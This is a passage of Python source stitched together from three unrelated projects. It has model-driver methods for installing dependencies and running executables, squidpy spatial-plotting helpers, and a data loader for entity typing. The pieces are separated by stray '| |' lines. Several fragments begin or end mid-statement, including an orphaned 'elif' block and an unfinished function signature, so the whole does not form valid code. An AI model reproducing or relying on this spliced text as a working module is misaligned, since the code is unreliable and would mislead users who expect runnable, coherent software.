def n_sent_messages(self):
    r"""dict: Number of messages sent by the model via each connection,
    keyed by connection driver name."""
    # On non-root MPI ranks, reuse the counts reported by the completed
    # 'stopped' request instead of querying local drivers.
    if (self._mpi_rank > 0) and self.check_mpi_request('stopped'):
        out = self._mpi_requests['stopped'].result
        return out
    out = {}
    for x in self.yml.get('output_drivers', []):
        x_inst = x.get('instance', None)
        if x_inst:
            out[x_inst.name] = x_inst.models_recvd.get(self.name, 0)
    if self.is_server:
        # Server models also send replies through rpc_request input drivers.
        for x in self.yml.get('input_drivers', []):
            x_inst = x.get('instance', None)
            if x_inst and (x_inst._connection_type == 'rpc_request'):
                out[x_inst.name] = x_inst.servers_recvd.get(self.name, 0)
    return out
@property
def has_sent_messages(self):
    r"""bool: True if output has been received from the model."""
    counts = self.n_sent_messages
    # No tracked connections at all counts as "sent".
    if not counts:
        return True
    return sum(counts.values()) != 0
def write_wrappers(self, **kwargs):
    r"""Write any wrappers needed to compile and/or run a model.

    Args:
        **kwargs: Keyword arguments are ignored (only included to
            allow cascade from child classes).

    Returns:
        list: Full paths to any created wrappers.
    """
    # Base implementation creates no wrappers; subclasses extend this.
    created = []
    return created
@classmethod
def install_model_dependencies(cls, dependencies, always_yes=False):
    r"""Install any dependencies required by the model.

    Args:
        dependencies (list): Dependencies that should be installed. Items
            may be package-name strings or dicts with 'package' and
            optional 'package_manager'/'arguments' keys.
        always_yes (bool, optional): If True, the package manager will
            not ask users for input during installation. Defaults to
            False.
    """
    grouped = {}
    for dep in dependencies:
        if isinstance(dep, str):
            dep = {'package': dep}
        if dep.get('arguments', None):
            # Dependencies carrying extra arguments are installed one at a
            # time so the arguments apply to the right package.
            cls.install_dependency(always_yes=always_yes, **dep)
        else:
            grouped.setdefault(dep.get('package_manager', None),
                               []).append(dep['package'])
    # Install the remaining packages in one batch per package manager.
    for manager, names in grouped.items():
        cls.install_dependency(names, package_manager=manager,
                               always_yes=always_yes)
@classmethod
def install_dependency(cls, package=None, package_manager=None,
                       arguments=None, command=None, always_yes=False):
    r"""Install a dependency.

    Args:
        package (str): Name of the package that should be installed. If
            the package manager supports it, this can include version
            requirements.
        package_manager (str, optional): Package manager that should be
            used to install the package. Defaults to a platform-derived
            choice (conda/brew/apt/choco) when not provided.
        arguments (str, optional): Additional arguments that should be
            passed to the package manager.
        command (list, optional): Command that should be used to
            install the package.
        always_yes (bool, optional): If True, the package manager will
            not ask users for input during installation. Defaults to
            False.

    Raises:
        NotImplementedError: If the package manager is not supported.
    """
    assert(package)
    if isinstance(package, str):
        package = package.split()
    # Pick a default package manager from the environment/platform.
    if package_manager is None:
        if tools.get_conda_prefix():
            package_manager = 'conda'
        elif platform._is_mac:
            package_manager = 'brew'
        elif platform._is_linux:
            package_manager = 'apt'
        elif platform._is_win:
            package_manager = 'choco'
    # yes_cmd holds the manager-specific "assume yes" flag, appended only
    # when always_yes is requested.
    yes_cmd = []
    cmd_kwargs = {}
    if command:
        cmd = copy.copy(command)
    elif package_manager == 'conda':
        cmd = ['conda', 'install'] + package
        if platform._is_win:  # pragma: windows
            # Conda commands must be run on the shell on windows as it
            # is implemented as a batch script
            cmd.insert(0, 'call')
            cmd_kwargs['shell'] = True
        yes_cmd = ['-y']
    elif package_manager == 'brew':
        cmd = ['brew', 'install'] + package
    elif package_manager == 'apt':
        cmd = ['apt-get', 'install'] + package
        if bool(os.environ.get('GITHUB_ACTIONS', False)):
            # Only enable sudo for testing, otherwise allow the user to
            # decide if they want to run yggdrasil with sudo, or just
            # install the dependencies themselves
            cmd.insert(0, 'sudo')
        yes_cmd = ['-y']
    elif package_manager == 'choco':
        cmd = ['choco', 'install'] + package
    elif package_manager == 'vcpkg':
        cmd = ['vcpkg.exe', 'install', '--triplet', 'x64-windows']
        cmd += package
    else:
        # Language-level package managers are delegated to the matching
        # language driver (pip -> python, cran -> r).
        package_managers = {'pip': 'python',
                            'cran': 'r'}
        if package_manager in package_managers:
            drv = import_component(
                'model', package_managers[package_manager])
            return drv.install_dependency(
                package=package, package_manager=package_manager,
                arguments=arguments, always_yes=always_yes)
        raise NotImplementedError(f"Unsupported package manager: "
                                  f"{package_manager}")
    if arguments:
        cmd += arguments.split()
    if always_yes:
        cmd += yes_cmd
    if cmd_kwargs.get('shell', False):
        # shell=True requires a single command string rather than a list.
        cmd = ' '.join(cmd)
    subprocess.check_call(cmd, **cmd_kwargs)
def model_command(self):
    r"""Return the command that should be used to run the model.

    Returns:
        list: Any commands/arguments needed to run the model from the
            command line.
    """
    cmd = [self.model_file]
    cmd.extend(self.model_args)
    return cmd
@classmethod
def language_executable(cls, **kwargs):
    r"""Command required to compile/run a model written in this language
    from the command line.

    Returns:
        str: Name of (or path to) compiler/interpreter executable required
            to run the compiler/interpreter from the command line. An
            empty string when the language has no executable.

    Raises:
        NotImplementedError: If the language driver does not override
            this method and the language requires an executable.
    """
    # Languages flagged no_executable have no interpreter/compiler.
    if cls.no_executable:
        return ''
    raise NotImplementedError("language_executable not implemented for '%s'"
                              % cls.language)
@classmethod
def executable_command(cls, args, unused_kwargs=None, **kwargs):
    r"""Compose a command for running a program using the exectuable for
    this language (compiler/interpreter) with the provided arguments.

    Args:
        args (list): The program that returned command should run and any
            arguments that should be provided to it.
        unused_kwargs (dict, optional): Existing dictionary that unused
            keyword arguments should be added to. Defaults to None and is
            ignored.
        **kwargs: Additional keyword arguments are ignored.

    Returns:
        list: Arguments composing the command required to run the program
            from the command line using the executable for this language.

    Raises:
        NotImplementedError: Always, in this base implementation; language
            drivers must override this method.
    """
    raise NotImplementedError("executable_command not implemented for '%s'"
                              % cls.language)
@classmethod
def run_executable(cls, args, return_process=False, debug_flags=None,
                   **kwargs):
    r"""Run a program using the executable for this language and the
    provided arguments.

    Args:
        args (list): The program that should be run and any arguments
            that should be provided to it.
        return_process (bool, optional): If True, the process class is
            returned without checking the process output. If False,
            communicate is called on the process and the output is parsed
            for errors. Defaults to False.
        debug_flags (list, optional): Debug executable and flags that should
            be prepended to the executable command. Defaults to None and
            is ignored.
        **kwargs: Additional keyword arguments are passed to
            cls.executable_command and tools.popen_nobuffer.

    Returns:
        str: Output to stdout from the run command if return_process is
            False, the process if return_process is True.

    Raises:
        RuntimeError: If the language is not installed.
        RuntimeError: If there is an error when running the command.
    """
    # executable_command collects the kwargs it does not consume into
    # unused_kwargs so they can be forwarded to the process call below.
    unused_kwargs = {}
    cmd = cls.executable_command(args, unused_kwargs=unused_kwargs, **kwargs)
    if isinstance(debug_flags, list):
        # Prepend the debugger executable/flags (e.g. strace/valgrind).
        cmd = debug_flags + cmd
    try:
        # Add default keyword arguments
        if 'working_dir' in unused_kwargs:
            # popen expects `cwd`, not `working_dir`.
            unused_kwargs.setdefault('cwd', unused_kwargs.pop('working_dir'))
        unused_kwargs.setdefault('shell', platform._is_win)
        # Call command
        logger.debug("Running '%s' from %s"
                     % (' '.join(cmd), unused_kwargs.get('cwd', os.getcwd())))
        logger.debug("Process keyword arguments:\n%s\n",
                     ' ' + pformat(unused_kwargs).replace('\n', '\n '))
        # NOTE(review): unconditional print of the command to stdout looks
        # like a debugging leftover — confirm whether it should be removed
        # or demoted to logger.debug.
        print(' '.join(cmd))
        proc = tools.popen_nobuffer(cmd, **unused_kwargs)
        if return_process:
            # Caller takes ownership of the running process.
            return proc
        out, err = proc.communicate()
        if proc.returncode != 0:
            # Surface captured stdout/stderr before failing so the cause of
            # the non-zero exit status is visible in the logs.
            if out:
                logger.info('\n%s' % out.decode('utf-8'))
            if err:  # pragma: debug
                logger.info('\n%s' % err.decode('utf-8'))
            raise RuntimeError("Command '%s' failed with code %d."
                               % (' '.join(cmd), proc.returncode))
        out = out.decode("utf-8")
        logger.debug('%s\n%s' % (' '.join(cmd), out))
        return out
    except (subprocess.CalledProcessError, OSError) as e:  # pragma: debug
        raise RuntimeError("Could not call command '%s': %s"
                           % (' '.join(cmd), e))
def run_validation(self):
    r"""Execute the model's validation script, if one is configured.

    No-op when ``validation_command`` is empty/None; otherwise the command
    is executed from the model's working directory via
    ``subprocess.check_call`` (raising ``CalledProcessError`` on a
    non-zero exit status).
    """
    command = self.validation_command
    if command:
        subprocess.check_call(command.split(), cwd=self.working_dir)
def run_model(self, return_process=True, **kwargs):
    r"""Run the model. Unless overridden, the model will be run using
    run_executable.

    Args:
        return_process (bool, optional): If True, the process running
            the model is returned. If False, the process will block until
            the model finishes running. Defaults to True.
        **kwargs: Keyword arguments are passed to run_executable.
    """
    env = self.set_env()
    command = self.model_command()
    if self.with_strace or self.with_valgrind:
        kwargs.setdefault('debug_flags', self.debug_flags)
    self.debug('Working directory: %s', self.working_dir)
    self.debug('Command: %s', ' '.join(command))
    self.debug('Environment Variables:\n%s', self.pprint(env, block_indent=1))
    # NOTE: Setting forward_signals to False allows faster debugging
    # but should not be used in deployment for cases where models are not
    # running locally.
    for key, val in (('env', env),
                     ('working_dir', self.working_dir),
                     ('forward_signals', False),
                     ('shell', platform._is_win)):
        kwargs.setdefault(key, val)
    return self.run_executable(command, return_process=return_process, **kwargs)
@property
def debug_flags(self):
    r"""list: Flags that should be prepended to an executable command to
    enable debugging."""
    flags = []
    if self.with_strace:
        if not platform._is_linux:  # pragma: debug
            raise RuntimeError("strace not supported on this OS.")
        # TODO: dtruss cannot be run without sudo, sudo cannot be
        # added to the model process command if it is not in the original
        # yggdrasil CLI call, and must be tested with an executable that
        # is not "signed with restricted entitlements" (which most built-in
        # utilities (e.g. sleep) are).
        # elif platform._is_mac:
        #     if 'sudo' in sys.argv:
        #         pre_args += ['sudo']
        #     pre_args += ['dtruss']
        flags = ['strace'] + self.strace_flags
    elif self.with_valgrind:
        flags = ['valgrind'] + self.valgrind_flags
    return flags
| |
from __future__ import annotations
from copy import copy
from types import MappingProxyType
from typing import (
Any,
List,
Type,
Tuple,
Union,
Mapping,
Optional,
Sequence,
NamedTuple,
TYPE_CHECKING,
)
from numbers import Number
from functools import partial
from typing_extensions import Literal
from matplotlib_scalebar.scalebar import ScaleBar
import itertools
from scanpy import logging as logg
from anndata import AnnData
from scanpy._settings import settings as sc_settings
from scanpy.plotting._tools.scatterplots import _add_categorical_legend
from pandas.api.types import CategoricalDtype
from pandas.core.dtypes.common import is_categorical_dtype
import numpy as np
import pandas as pd
import dask.array as da
from matplotlib import colors, pyplot as plt, rcParams, patheffects
from matplotlib.cm import get_cmap
from matplotlib.axes import Axes
from matplotlib.colors import (
Colormap,
Normalize,
TwoSlopeNorm,
ColorConverter,
ListedColormap,
)
from matplotlib.figure import Figure
from matplotlib.patches import Circle, Polygon, Rectangle
from matplotlib.gridspec import GridSpec
from matplotlib.collections import Collection, PatchCollection
from skimage.util import map_array
from skimage.color import label2rgb
from skimage.morphology import square, erosion
from skimage.segmentation import find_boundaries
from squidpy._utils import NDArrayA
from squidpy.pl._utils import _assert_value_in_obs
from squidpy.im._coords import CropCoords
from squidpy.pl._color_utils import _get_palette, _maybe_set_colors
from squidpy._constants._constants import ScatterShape
from squidpy._constants._pkg_constants import Key
# Marker shape accepted by the spatial scatter plotting functions.
_AvailShapes = Literal["circle", "square", "hex"]
# Palette: a matplotlib colormap name or an explicit ListedColormap.
Palette_t = Optional[Union[str, ListedColormap]]
# A single Normalize or a sequence of them (presumably one per panel — confirm).
_Normalize = Union[Normalize, Sequence[Normalize]]
# Scalar-or-sequence convenience aliases.
_SeqStr = Union[str, Sequence[str]]
_SeqFloat = Union[float, Sequence[float]]
_SeqArray = Union[NDArrayA, Sequence[NDArrayA]]
# 4-tuple of crop coordinates (ordering defined by CropCoords).
_CoordTuple = Tuple[int, int, int, int]
# Font aliases mirror matplotlib's accepted string values.
_FontWeight = Literal["light", "normal", "medium", "semibold", "bold", "heavy", "black"]
_FontSize = Literal["xx-small", "x-small", "small", "medium", "large", "x-large", "xx-large"]
# named tuples
class FigParams(NamedTuple):
    """Figure params."""

    fig: Figure  # matplotlib figure being drawn on
    ax: Axes  # single axes object
    axs: Sequence[Axes] | None  # per-panel axes, when more than one panel
    iter_panels: Tuple[Sequence[Any], Sequence[Any]]  # values iterated per panel
    title: _SeqStr | None  # title(s) for the panel(s)
    ax_labels: Sequence[str]  # axis labels
    frameon: bool | None  # whether to draw the axes frame
class CmapParams(NamedTuple):
    """Cmap params."""

    cmap: Colormap  # colormap for the plotted values
    img_cmap: Colormap  # colormap applied to the underlying image
    norm: Normalize  # normalization applied before colormapping
class OutlineParams(NamedTuple):
    """Outline params."""

    outline: bool  # whether to draw outlines at all
    gap_size: float  # size of the inner (gap) outline
    gap_color: str  # color of the inner outline
    bg_size: float  # size of the outer (background) outline
    bg_color: str  # color of the outer outline
class ScalebarParams(NamedTuple):
    """Scalebar params."""

    scalebar_dx: Sequence[float] | None  # size-per-pixel of the scalebar, per library
    scalebar_units: _SeqStr | None  # unit label(s) shown on the scalebar
class ColorParams(NamedTuple):
    """Color params."""

    shape: _AvailShapes | None  # marker shape; None for plain scatter
    color: Sequence[str | None]  # keys/values to color by
    groups: Sequence[str] | None  # categorical groups to restrict to
    alpha: float  # marker transparency
    img_alpha: float  # image transparency
    use_raw: bool  # whether values are taken from adata.raw
class SpatialParams(NamedTuple):
    """Spatial params."""
    # NOTE: docstring previously read "Color params." — copy-paste from ColorParams.

    library_id: Sequence[str]  # libraries to plot
    scale_factor: Sequence[float]  # per-library coordinate scale factor
    size: Sequence[float]  # per-library marker size
    img: Sequence[NDArrayA] | Tuple[None, ...]  # background images, or Nones
    segment: Sequence[NDArrayA] | Tuple[None, ...]  # segmentation masks, or Nones
    cell_id: Sequence[NDArrayA] | Tuple[None, ...]  # per-library cell ids, or Nones
# Shorthand for matplotlib's color-to-hex conversion that preserves alpha.
to_hex = partial(colors.to_hex, keep_alpha=True)
def _get_library_id(
    adata: AnnData,
    shape: _AvailShapes | None,
    spatial_key: str = Key.uns.spatial,
    library_id: Sequence[str] | None = None,
    library_key: str | None = None,
) -> Sequence[str]:
    """Resolve the list of library ids to plot.

    Resolution order: ``adata.uns[spatial_key]`` when a marker ``shape`` is
    given, then the categories of ``adata.obs[library_key]``, otherwise the
    explicit ``library_id`` argument (with a dummy fallback).
    """
    if shape is not None:
        # Shape-based plotting requires ids registered under `spatial_key`.
        resolved = Key.uns.library_id(adata, spatial_key, library_id, return_all=True)
        if resolved is None:
            raise ValueError(f"Could not fetch `library_id`, check that `spatial_key: {spatial_key}` is correct.")
        return resolved
    if library_key is not None:
        if library_key not in adata.obs:
            raise KeyError(f"`library_key: {library_key}` not in `adata.obs`.")
        if library_id is None:
            library_id = adata.obs[library_key].cat.categories.tolist()
        _assert_value_in_obs(adata, key=library_key, val=library_id)
        return [library_id] if isinstance(library_id, str) else library_id
    if library_id is None:
        logg.warning("Please specify a valid `library_id` or set it permanently in `adata.uns['spatial']`")
        return [""]  # dummy value to maintain logic of number of plots (nplots=library_id*color)
    if isinstance(library_id, str):
        return [library_id]
    if isinstance(library_id, list):
        return library_id
    raise TypeError(f"Invalid `library_id`: {library_id}.")
def _get_image(
    adata: AnnData,
    library_id: Sequence[str],
    spatial_key: str = Key.obsm.spatial,
    img: bool | _SeqArray | None = None,
    img_res_key: str | None = None,
    img_channel: int | List[int] | None = None,
    img_cmap: Colormap | str | None = None,
) -> Union[Sequence[NDArrayA], Tuple[None, ...]]:
    """Collect one background image per library, with optional channel
    selection and grayscale conversion."""
    from squidpy.pl._utils import _to_grayscale

    if isinstance(img, (list, np.ndarray, da.Array)):
        # Explicit image(s) were passed in; just validate length/type.
        imgs = _get_list(img, _type=(np.ndarray, da.Array), ref_len=len(library_id), name="img")
    else:
        image_mapping = Key.uns.library_mapping(adata, spatial_key, Key.uns.image_key, library_id)
        available_keys = _get_unique_map(image_mapping)
        if img_res_key is None:
            img_res_key = available_keys[0]
        elif img_res_key not in available_keys:
            raise KeyError(
                f"Image key: `{img_res_key}` does not exist. Available image keys: `{image_mapping.values()}`"
            )
        imgs = [adata.uns[Key.uns.spatial][i][Key.uns.image_key][img_res_key] for i in library_id]

    if img_channel is None:
        # Default: at most the first three channels (RGB).
        imgs = [im[..., :3] for im in imgs]
    elif isinstance(img_channel, int):
        imgs = [im[..., [img_channel]] for im in imgs]
    elif isinstance(img_channel, list):
        imgs = [im[..., img_channel] for im in imgs]
    else:
        raise TypeError(f"Expected image channel to be either `int` or `None`, found `{type(img_channel).__name__}`.")

    return [_to_grayscale(im) for im in imgs] if img_cmap == "gray" else imgs
def _get_segment(
    adata: AnnData,
    library_id: Sequence[str],
    seg_cell_id: str | None = None,
    library_key: str | None = None,
    seg: _SeqArray | bool | None = None,
    seg_key: str | None = None,
) -> Tuple[Sequence[NDArrayA], Sequence[NDArrayA]] | Tuple[Tuple[None, ...], Tuple[None, ...]]:
    """Fetch segmentation masks plus per-library integer cell-id vectors.

    Raises when ``seg_cell_id``/``library_key`` are missing from ``adata.obs``
    or when the cell ids are not of an integer dtype.
    """
    if seg_cell_id not in adata.obs:
        raise ValueError(f"Cell id `{seg_cell_id!r}` not found in `adata.obs`.")
    ids = adata.obs[seg_cell_id].values
    if library_key not in adata.obs:
        raise ValueError(f"Library key `{library_key}` not found in `adata.obs`.")
    if not np.issubdtype(ids.dtype, np.integer):
        raise ValueError(f"Invalid type `{ids.dtype}` for `adata.obs[{seg_cell_id!r}]`.")
    # Split the cell ids per library.
    per_library_ids = [ids[adata.obs[library_key] == lib] for lib in library_id]
    if isinstance(seg, (list, np.ndarray, da.Array)):
        masks = _get_list(seg, _type=(np.ndarray, da.Array), ref_len=len(library_id), name="img_seg")
    else:
        masks = [adata.uns[Key.uns.spatial][lib][Key.uns.image_key][seg_key] for lib in library_id]
    return masks, per_library_ids
def _get_scalefactor_size(
    adata: AnnData,
    library_id: Sequence[str],
    spatial_key: str = Key.obsm.spatial,
    img_res_key: str | None = None,
    scale_factor: _SeqFloat | None = None,
    size: _SeqFloat | None = None,
    size_key: str | None = Key.uns.size_key,
) -> Tuple[Sequence[float], Sequence[float]]:
    """Resolve per-library coordinate ``scale_factor`` and marker ``size``.

    Uses scalefactor metadata stored in ``adata.uns`` when present and
    matching ``img_res_key``; otherwise falls back to user-provided values
    or defaults (scale factor 1.0, size 120000 / n_obs).
    """
    try:
        scalefactor_mapping = Key.uns.library_mapping(adata, spatial_key, Key.uns.scalefactor_key, library_id)
        scalefactors = _get_unique_map(scalefactor_mapping)
    except KeyError as e:
        # No scalefactor metadata stored for these libraries; use fallbacks below.
        scalefactors = None
        logg.debug(f"Setting `scalefactors={scalefactors}`, reason: `{e}`")
    if scalefactors is not None and img_res_key is not None:
        if scale_factor is None:  # get intersection of scale_factor and match to img_res_key
            scale_factor_key = [i for i in scalefactors if img_res_key in i]
            if not len(scale_factor_key):
                raise ValueError(f"No `scale_factor` found that could match `img_res_key`: {img_res_key}.")
            _scale_factor_key = scale_factor_key[0]  # get first scale_factor
            scale_factor = [
                adata.uns[Key.uns.spatial][i][Key.uns.scalefactor_key][_scale_factor_key] for i in library_id
            ]
        else:  # handle case where scale_factor is float or list
            scale_factor = _get_list(scale_factor, _type=float, ref_len=len(library_id), name="scale_factor")
        if size_key not in scalefactors and size is None:
            raise ValueError(
                f"Specified `size_key: {size_key}` does not exist and size is `None`, "
                f"available keys are: `{scalefactors}`. Specify a valid `size_key` or `size`."
            )
        if size is None:
            size = 1.0
        size = _get_list(size, _type=Number, ref_len=len(library_id), name="size")
        if not (len(size) == len(library_id) == len(scale_factor)):
            raise ValueError("Len of `size`, `library_id` and `scale_factor` do not match.")
        # stored size * user size * scale factor * 0.5 (presumably converting a
        # diameter to a radius — confirm against the stored `size_key` value).
        size = [
            adata.uns[Key.uns.spatial][i][Key.uns.scalefactor_key][size_key] * s * sf * 0.5
            for i, s, sf in zip(library_id, size, scale_factor)
        ]
        return scale_factor, size
    # Fallback path: no stored metadata (or no image resolution key).
    scale_factor = 1.0 if scale_factor is None else scale_factor
    scale_factor = _get_list(scale_factor, _type=float, ref_len=len(library_id), name="scale_factor")
    size = 120000 / adata.shape[0] if size is None else size
    size = _get_list(size, _type=Number, ref_len=len(library_id), name="size")
    return scale_factor, size
def _image_spatial_attrs(
    adata: AnnData,
    shape: _AvailShapes | None = None,
    spatial_key: str = Key.obsm.spatial,
    library_id: Sequence[str] | None = None,
    library_key: str | None = None,
    img: bool | _SeqArray | None = None,
    img_res_key: str | None = Key.uns.image_res_key,
    img_channel: int | List[int] | None = None,
    seg: _SeqArray | bool | None = None,
    seg_key: str | None = None,
    cell_id_key: str | None = None,
    scale_factor: _SeqFloat | None = None,
    size: _SeqFloat | None = None,
    size_key: str | None = Key.uns.size_key,
    img_cmap: Colormap | str | None = None,
) -> SpatialParams:
    """Gather all per-library spatial plotting attributes into a ``SpatialParams``.

    Resolves library ids, scale factors and sizes, background images and
    segmentation masks, substituting ``(None, ...)`` placeholders where
    images or segmentations are not requested.
    """
    def truthy(img: bool | NDArrayA | _SeqArray | None) -> bool:
        # True for `True` or a non-empty array/sequence; False for None/False.
        if img is None or img is False:
            return False
        return img is True or len(img)  # type: ignore
    library_id = _get_library_id(
        adata=adata, shape=shape, spatial_key=spatial_key, library_id=library_id, library_key=library_key
    )
    # Multiple libraries need a library_key to split observations per library.
    if len(library_id) > 1 and library_key is None:
        raise ValueError(
            f"Found `library_id: `{library_id} but no `library_key` was specified. Please specify `library_key`."
        )
    scale_factor, size = _get_scalefactor_size(
        adata=adata,
        spatial_key=spatial_key,
        library_id=library_id,
        img_res_key=img_res_key,
        scale_factor=scale_factor,
        size=size,
        size_key=size_key,
    )
    # Fetch images only when requested together with a segmentation or a shape.
    if (truthy(img) and truthy(seg)) or (truthy(img) and shape is not None):
        _img = _get_image(
            adata=adata,
            spatial_key=spatial_key,
            library_id=library_id,
            img=img,
            img_res_key=img_res_key,
            img_channel=img_channel,
            img_cmap=img_cmap,
        )
    else:
        _img = (None,) * len(library_id)
    if truthy(seg):
        _seg, _cell_vec = _get_segment(
            adata=adata,
            library_id=library_id,
            seg_cell_id=cell_id_key,
            library_key=library_key,
            seg=seg,
            seg_key=seg_key,
        )
    else:
        _seg = (None,) * len(library_id)
        _cell_vec = (None,) * len(library_id)
    return SpatialParams(library_id, scale_factor, size, _img, _seg, _cell_vec)
def _set_coords_crops(
    adata: AnnData,
    spatial_params: SpatialParams,
    spatial_key: str,
    crop_coord: Sequence[_CoordTuple] | _CoordTuple | None = None,
) -> Tuple[List[NDArrayA], List[CropCoords] | List[None]]:
    """Scale spatial coordinates per library and build optional crop boxes."""
    n_libs = len(spatial_params.library_id)
    if crop_coord is None:
        crops = [None] * n_libs
    else:
        crop_coord = _get_list(crop_coord, _type=tuple, ref_len=n_libs, name="crop_coord")
        # Crops are specified in unscaled coordinates; apply the scale factor.
        crops = [CropCoords(*cr) * sf for cr, sf in zip(crop_coord, spatial_params.scale_factor)]  # type: ignore[misc]
    coords = adata.obsm[spatial_key]
    scaled_coords = [coords * sf for sf in spatial_params.scale_factor]
    return scaled_coords, crops  # TODO(giovp): refactor with _subs
def _subs(
adata: AnnData,
coords: NDArrayA,
img: NDArrayA | None = None,
library_key: str | None = None,
library_id: str | None = None,
crop_coords: CropCoords | None = None,
groups_key: str | None = None,
groups: Sequence[Any] | None = None,
) -> | |
elif args.goal == 'ufet':
self.word2id = transformer_constant.ANS2ID_DICT_UFET
else:
print('ERROR: Invalid input... ' + args.goal)
raise
self.tokenizer = tokenizer
self.do_lower = args.do_lower
self.context_window_size = args.context_window_size
self.args = args
def _load_npz(self, path):
    """Load a NumPy array from ``path``.

    NOTE(review): ``np.load`` runs inside the ``with`` block but the result
    is returned after the file is closed; ``.npz`` archives are lazily
    loaded and would be unusable after close — presumably this is only used
    for eagerly-loaded ``.npy`` files. Confirm.
    """
    with open(path, 'rb') as f:
        data = np.load(f)
    return data
def _load_shard(self):
    """Turn ``self.data`` into a zipped stream of per-example tuples.

    Each element is (ex_id, left/right/mention for pos sent1 and sent2,
    left/right/mention for neg sent1 and sent2). Words are lower-cased when
    ``self.do_lower`` and contexts are clipped to ``self.context_window_size``
    words on each side of the mention.
    """
    lines = self.data
    ex_ids = list(range(len(lines)))
    # Positive pair, sentence 1.
    mention_word_pos1 = [line['pos']['sent1']["word"].split() if not self.do_lower
                         else line['pos']['sent1']["word"].lower().split() for line in lines]
    left_seq_pos1 = [line['pos']['sent1']['left_context'][-self.context_window_size:] if not self.do_lower
                     else [w.lower() for w in line['pos']['sent1']['left_context']][-self.context_window_size:] for line in lines]
    right_seq_pos1 = [line['pos']['sent1']['right_context'][:self.context_window_size] if not self.do_lower
                      else [w.lower() for w in line['pos']['sent1']['right_context']][:self.context_window_size] for line in lines]
    # Positive pair, sentence 2.
    mention_word_pos2 = [line['pos']['sent2']["word"].split() if not self.do_lower
                         else line['pos']['sent2']["word"].lower().split() for line in lines]
    left_seq_pos2 = [line['pos']['sent2']['left_context'][-self.context_window_size:] if not self.do_lower
                     else [w.lower() for w in line['pos']['sent2']['left_context']][-self.context_window_size:] for line in lines]
    right_seq_pos2 = [line['pos']['sent2']['right_context'][:self.context_window_size] if not self.do_lower
                      else [w.lower() for w in line['pos']['sent2']['right_context']][:self.context_window_size] for line in lines]
    # Negative pair, sentence 1.
    mention_word_neg1 = [line['neg']['sent1']["word"].split() if not self.do_lower
                         else line['neg']['sent1']["word"].lower().split() for line in lines]
    left_seq_neg1 = [line['neg']['sent1']['left_context'][-self.context_window_size:] if not self.do_lower
                     else [w.lower() for w in line['neg']['sent1']['left_context']][-self.context_window_size:] for line in lines]
    right_seq_neg1 = [line['neg']['sent1']['right_context'][:self.context_window_size] if not self.do_lower
                      else [w.lower() for w in line['neg']['sent1']['right_context']][:self.context_window_size] for line in lines]
    # Negative pair, sentence 2.
    mention_word_neg2 = [line['neg']['sent2']["word"].split() if not self.do_lower
                         else line['neg']['sent2']["word"].lower().split() for line in lines]
    left_seq_neg2 = [line['neg']['sent2']['left_context'][-self.context_window_size:] if not self.do_lower
                     else [w.lower() for w in line['neg']['sent2']['left_context']][-self.context_window_size:] for line
                     in lines]
    right_seq_neg2 = [line['neg']['sent2']['right_context'][:self.context_window_size] if not self.do_lower
                      else [w.lower() for w in line['neg']['sent2']['right_context']][:self.context_window_size] for
                      line in lines]
    # Ddebug
    # NOTE(review): dead debug code — `left_seq`, `right_seq` and
    # `mention_word` are not defined in this method, so this block would
    # raise NameError if ever enabled.
    if False:
        idx = 0
        print('ex_ids: ', ex_ids[idx])
        print('left_seq: ', left_seq[idx])
        print('right_seq: ', right_seq[idx])
        print('mention_word: ', mention_word[idx])
        print(
            '0) ex_ids:', len(ex_ids),
            '1) left_seq_pos1:', len(left_seq_pos1), '2) right_seq+pos1:', len(right_seq_pos1), '3) mention_word_pos1:',
            len(mention_word_pos1), '4) left_seq_pos2:', len(left_seq_pos2), '5) right_seq_pos2:', len(right_seq_pos2),
            '6) mention_word_pos2:', len(mention_word_pos2), '7) left_seq_neg1:', len(left_seq_neg1), '8) right_seq_neg1:',
            len(right_seq_neg1), '9) mention_word_neg1:', len(mention_word_neg1), '10) left_seq_neg2:', len(left_seq_neg2),
            '11) right_seq_neg2:', len(right_seq_neg2), '12) mention_word_neg2:', len(mention_word_neg2)
        )
    return zip(ex_ids, left_seq_pos1, right_seq_pos1, mention_word_pos1,
               left_seq_pos2, right_seq_pos2, mention_word_pos2,
               left_seq_neg1, right_seq_neg1, mention_word_neg1,
               left_seq_neg2, right_seq_neg2, mention_word_neg2)
def _get_sentence(self, epoch):
    """Yield every example tuple from the shard, repeated ``epoch`` times."""
    for _ in range(epoch):
        for example in self._load_shard():
            yield example
def get_batch(self, batch_size, max_len, epoch, eval_data=True):
    """Return the batch generator for this dataset."""
    sentence_stream = self._get_sentence(epoch)
    answer_num = transformer_constant.ANSWER_NUM_DICT[self.args.goal]
    return get_type_reduction_example(
        sentence_stream, batch_size=batch_size, max_len=max_len,
        eval_data=eval_data, tokenizer=self.tokenizer, answer_num=answer_num
    )
def get_type_reduction_LR_example(generator, batch_size, max_len, eval_data=False, tokenizer=None):
    """Yield batches of tokenized (sent1, sent2) mention/context pairs.

    Args:
        generator: Iterator of per-example tuples
            (ex_id, left1, right1, mention1, left2, right2, mention2, label),
            where contexts and mentions are lists of words.
        batch_size: Number of examples per batch.
        max_len: Maximum wordpiece length for a tokenized pair.
        eval_data: If True, the final partial batch is also yielded.
        tokenizer: HuggingFace-style tokenizer providing ``encode_plus`` and
            ``batch_encode_plus``.

    Yields:
        dict: ``{"ex_ids": object ndarray, "inputs": {"sent1": ..., "sent2": ...},
        "targets": float32 torch tensor of labels}``.
    """
    # [cur_stream elements]
    # 0: example id, 1: left context_pos1, 2: right context_pos1, 3: mention word_pos1,
    # 4: left context_pos2, 5: right context_pos2, 6: mention word_pos2,
    # 7: labels
    cur_stream = [None] * batch_size
    no_more_data = False
    mention_length_limit = 10  # in words, not word pieces
    while True:
        bsz = batch_size
        for i in range(batch_size):
            try:
                cur_stream[i] = list(next(generator))
            except StopIteration:
                no_more_data = True
                bsz = i
                break
        if no_more_data and bsz == 0:
            break
        # BUG FIX: `np.object` was removed in NumPy 1.24; the builtin `object`
        # is the supported spelling of the same dtype.
        ex_ids = np.zeros([bsz], dtype=object)
        targets = np.zeros([bsz], np.float32)
        inputs_sent1 = []
        inputs_sent2 = []
        sentence_len_wp_sent1 = []
        sentence_len_wp_sent2 = []
        for i in range(bsz):
            ex_ids[i] = cur_stream[i][0]
            # sent1: clip over-long mentions, then trim right-context words
            # until the tokenized pair fits within max_len.
            left_seq_sent1 = cur_stream[i][1]
            right_seq_sent1 = cur_stream[i][2]
            mention_seq_sent1 = cur_stream[i][3]
            if len(mention_seq_sent1) > mention_length_limit:
                mention_seq_sent1 = mention_seq_sent1[:mention_length_limit]
